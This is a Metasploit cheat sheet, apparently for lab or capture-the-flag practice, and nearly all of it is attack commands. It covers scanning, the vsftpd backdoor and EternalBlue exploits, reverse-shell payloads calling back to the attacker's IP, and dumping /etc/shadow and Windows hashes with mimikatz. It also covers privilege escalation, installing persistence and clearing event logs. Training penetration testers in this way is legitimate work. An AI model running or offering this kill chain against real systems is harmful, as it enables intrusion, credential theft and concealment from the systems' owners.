๐ŸŒ 1.Start Metasploit Console

sudo systemctl start postgresql
msfconsole

Initialize the Metasploit Database (First Time Only)

msfdb init

๐Ÿ” 2. Scanning Targets

Quick Target Discovery

nmap -sn 10.10.10.0/24

Full Port + Version Scan (Integrated with Metasploit DB)

db_nmap -sC -sV -O -Pn 10.10.10.129

View Discovered Hosts & Services

hosts
services

๐Ÿชก 3. Exploit Search and Module Use

Search by service name or CVE

search vsftpd
search type:exploit name:smb

Load a Module

use exploit/unix/ftp/vsftpd_234_backdoor

Explore Module Info

info        # Shows full module details (author, platform, options, etc)
show options   # Required + optional settings (RHOSTS, LHOST, etc)
show advanced  # Advanced options like threads, timeouts, proxies
show payloads  # Compatible payloads for this exploit

๐Ÿ’ก 4. Linux Exploitation Workflow

Example: FTP Backdoor

use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 10.10.10.129
set payload cmd/unix/interact
run

If Shell is Basic: Upgrade

python3 -c 'import pty; pty.spawn("/bin/bash")'

Or Use Web Delivery

use exploit/multi/script/web_delivery
set payload linux/x86/meterpreter/reverse_tcp
set LHOST <your_ip>
set LPORT 4444
run

Post-Exploitation (Linux)

sessions -i 1
getuid
sysinfo

Enumerate OS and Configs

run post/linux/gather/enum_os
run post/linux/gather/enum_configs

Dump Password Hashes

download /etc/passwd
download /etc/shadow
john shadow --wordlist=/usr/share/wordlists/rockyou.txt

Local Exploit Suggestion

run post/multi/recon/local_exploit_suggester

Example Local Root Exploit

use exploit/linux/local/dirty_cow
set SESSION 1
run

Confirm Root

id
whoami

๐Ÿ’ป 5. Windows Exploitation Workflow

Example: EternalBlue

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.130
set LHOST <your_ip>
set payload windows/x64/meterpreter/reverse_tcp
run

Session Handling

sessions
sessions -i 1
sysinfo
getuid

Post-Exploitation (Windows)

Dump Hashes

hashdump
load kiwi
kiwi_cmd "lsadump::sam"

Process Migration

ps
migrate <pid>
getpid

Privilege Escalation

getsystem

Or use:

use exploit/windows/local/bypassuac
set SESSION 1
run

Suggested Priv Esc Modules

run post/windows/escalate/ms10_015_kitrap0d

Credential Dumping

kiwi_cmd "creds_wdigest"
kiwi_cmd "kerberos::list"

Persistence

run persistence -U -i 5 -p 4444 -r <your_ip>

Clear Logs

clearev

๐Ÿ“ 6. Metasploit File Management

Upload / Download Files

upload evil.exe
download C:\\Users\\Admin\\Desktop\\flag.txt

๐Ÿ”ฎ 7. Cheatsheet Commands

TaskCommand
Start consolemsfconsole
Scan w/ nmapdb_nmap -sC -sV <ip>
List hosts/serviceshosts, services
Search modulesearch <name>
Use moduleuse <exploit>
Show optionsshow options, show advanced
Show payloadsshow payloads
Run exploitrun or exploit
Manage sessionssessions -i <id>
Hashdumphashdump
Post modulesrun post/...
Load Kiwi (mimikatz)load kiwi
File actionsupload, download
Clean logs (Windows)clearev

๐Ÿš€ Tools + Resources

  • searchsploit: offline exploit search
  • john: password cracking
  • nmap: port scanning
  • linpeas.sh, winpeas.exe: manual privilege escalation
  • LOLBAS: Windows native bin abuse
  • GTFOBins: Linux privilege escalation